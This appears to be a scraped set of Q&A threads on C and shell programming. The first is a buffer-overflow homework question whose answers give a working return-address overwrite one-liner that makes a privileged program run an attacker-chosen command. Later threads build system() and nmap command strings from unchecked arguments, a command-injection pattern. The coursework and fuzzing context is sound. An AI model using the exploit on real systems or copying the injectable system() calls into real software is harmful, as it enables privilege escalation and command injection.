I'm doing a buffer overflow assignment and I'm stuck on the syntax for this command:
$ ./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"' | touch test.txt)
We're expected to use this one liner instead of a shell. The return address is correct and it takes me to the correct place in the assembly, but when I run this, the functions execute as the standard user, instead of running as root.
From what I gather, the issue is either syntax or quotation marks.
How could I correct the one liner?
Source for Script
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
char arg1[60];
char arg2[60];
void func(char *s){
char buf[32];
strcpy(buf, s);
printf("you entered: %s\n", buf);
}
void secret(){
system(arg2);
}
int main(int argc, char *argv[]){
if(argc < 2){
printf("Usage: %s some_string\n", argv[0]);
return 2;
}
strcpy(arg1, argv[1]);
if (argc == 3) {
strcpy(arg2, argv[2]);
}
func(argv[1]);
return 0;
}
I think you the part that says | touch test.txt) is not needed.
./script $(perl -e 'print "A" x 36 . "\x40\x83\x04\x08"') "touch test.txt"
should work.
I am not sure why you are piping the output of the shell script to the touch command (I am assuming the buffer overflow you want to exploit is in the script, and it ends up somehow using the second argument as a parameter to a function).
As in terms of why it's being executed as normal user, in your scenario, your shell was running touch as a normal user. What I think you want to do is run your script as root (either by making it a setuid binary or just running the program with sudo, and make the script actually perform the call to system("touch ...");.
After some tinkering, and a bunch of help from the community, the resolution was to use:
./step4 `perl -e 'print "A" x 36 . "\x94\x84\x04\x08"'` "touch test.txt"
I checked the assembly in gdb, called the correct address for the secret function and by swapping the $() for back ticks, the attack executed as expected. Big thanks to Marco for the help on this one.
Related
I am trying AFL for the first time, and for that reason i found a very simple vulnerable C code that i could use to test AFL.
The C code in questions is
#include <stdio.h>
#include <string.h>
int main(int argc, char * argv[]){
char name[10];
if ( argc > 1 ){
strcpy(name, argv[1]);
printf("HELLO %s\n", name);
}
return 0;
}
I compile that code by running afl-gcc test.c -o test and i tested it just to make sure it crashes when it was suppose to (running ./test $(python3 -c "print('A'*26)") will give a segmentation fault as expected)
The problem here is, i created a testcase echo -en "test\x00" > input/testcase and run AFL afl-fuzz -i afl_in -o afl_out -- ./test but after a day it still hasn't found any crashes.
I also tried to create a test case that would force it crash python3 -c "print('A'*26)" > input/testcase but it still runs and does not find anything.
This was suppose to be the easiest example so i could get to know AFL a bit better but it is proving to be a challege. Can anyone help?
Just as Nick ODell post it in the comments
Seems like AFL expects the program under test to read from STDIN rather than an argument. github.com/google/AFL#6-fuzzing-binaries
Following that URL shows an experimental module that allows for AFL to read from an argument, and for that to work i just had to add 2 lines to my existing code:
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include "argv-fuzz-inl.h" // <-- Argv fuzz module
int main(int argc, char * argv[]){
AFL_INIT_ARGV(); // <-- needed near the very beginning of main().
char name[10];
if ( argc > 1 ){
strcpy(name, argv[1]);
printf("HELLO %s\n", name);
}
return 0;
}
After that i just compiled it again and everything worked as expected.
default setting
setting changed.
How can I set this in command line?
I'm going to write a c program using system() call.
Thank you.
You can find some documentation on archlinux: https://wiki.archlinux.org/index.php/Vino
From a command line, you would have to type:
gsettings set org.gnome.Vino vnc-password $(echo -n 'mypasswd'|base64)
So, the equivalent C source should be:
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
char command[256];
sprintf(command, "gsettings set org.gnome.Vino vnc-password $(echo -n '%s'|base64)", argv[1]);
system(command);
return 0;
}
Note that this code lakes at least:
test that the program is called with one parameter
use snprintf instead of sprintf (to prevent writing to much data in command)
I'm currently trying to change the process name of a process so I can read the more easily with htop, top, .... I want to LD_PRELOAD this code into another process so it gets renamed by an environemt variable.
I found a lot of stuff in the internet, but nothing works:
prctl(PR_SET_NAME, "Test");
This does not work because htop is not honoring the name.
Nginx setproctitle (Link) doesn't work as well, because it strips the parameters (which are needed by the process).
I tried everything I found and now I'm out of ideas.
Is this even possible in linux? And how?
Just run your program by shell script or your program through exec and pass desired name as argv[0]:
#/bin/bash
exec -a fancy_name a.out ...
or C/C++:
execl( "./a.out", "fancy_name", ... );
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define NEW_NAME "hello_world"
int main(int argc, char **argv) {
if(strcmp(argv[0], NEW_NAME)) {
argv[0] = NEW_NAME;
execv("/proc/self/exe", argv);
fputs("exec failed", stderr);
return 1;
}
while(1) // so it goes to the top
;
}
I have shell scripts and I need to run that continuous work in background.
For example:
#include <stdio.h>
int main(int argc, char **argv)
{
for (; ;) {
system("./dup -r /root/duptest/");
sleep(60);
}
return 0;
}
It's working and run every minute.
First question: How can I run this background(like & --> ./dup ... &) without put &.
Second question: How can I put shell codes in C source codes?
I found this, Do I need to put \n\ for all lines? It's so hard for edit.
#include <stdio.h>
#include <stdlib.h>
#define SHELLSCRIPT "\
#/bin/bash \n\
echo \"hello\" \n\
echo \"how are you\" \n\
echo \"today\" \n\
"
int main()
{
system(SHELLSCRIPT);
return 0;
}
Third question: How can I use shell parameter in C, like this:
./dup.exe -r /blablabla...
mean
system("./dup -r /blablabla");
I need to use $1 $2 parameter with compiled C program.
Question 1: Look for "how to make a process as deamon process in UNIX" Although daemon process is a overkill for your requirement, you can perform steps until the process is running according to your requirements
Question 3: You need to have command line arguments, check about that. Your main should look like main(int arg_count, char *args_vector[]){...} and in that you can access each command line argument as an array element
Q1: use fork() and don't wait on the child's PID.
Q2: C and C++ will concatenate adjacent string literals, like so:
static const char script[] =
"echo hello\n"
"echo how are you\n"
"echo today"
;
int main(int argc, char* argv[])
{
puts(script); // so you can see what it looks like
// system(script); // <-- uncomment this line to actually run it.
return 0;
}
Q3: use the argc and argv parameters to main() to build the command line you want to execute.
I don't really know how to explain this but here's my problem:
I am trying to make my program accept command line arguments and then run a program via. the Linux command line (CentOS 6).
Heres the main function:
int main(int argc, char *argv[])
I am trying to run a Linux program, here's the code:
system("nmap -sT -p 19 1.1.1.* -oG - | grep 19/open > temp");
I want to replace '1.1.1.*' with the first argument I input into my C program, Ex:
system("nmap -sT -p 19 ", (argv[1]) "-oG - | grep 19/open > temp");
I have tried multiple ways and none seemed to work.
To sum it up, i'm trying to take the first argument I input into my program and use it in replace of the '1.1.1.*' in the system function. I have no idea on how to do this, I'm new to C programming. Thank you all replies are appreciated.
snprintf is the safest way to do this, this is a simple example without any checking of argc etc...:
#include <string.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
char buf[200] ;
char str1[] = "nmap -sT -p 19 ";
char str2[] = " -oG - | grep 19/open > temp";
snprintf(buf, 200, "%s%s%s", str1, argv[1], str2);
printf( "%s\n", buf ) ;;
}
Just use the following syntax to accept command line arguments in Linux.
./program arg1 arg2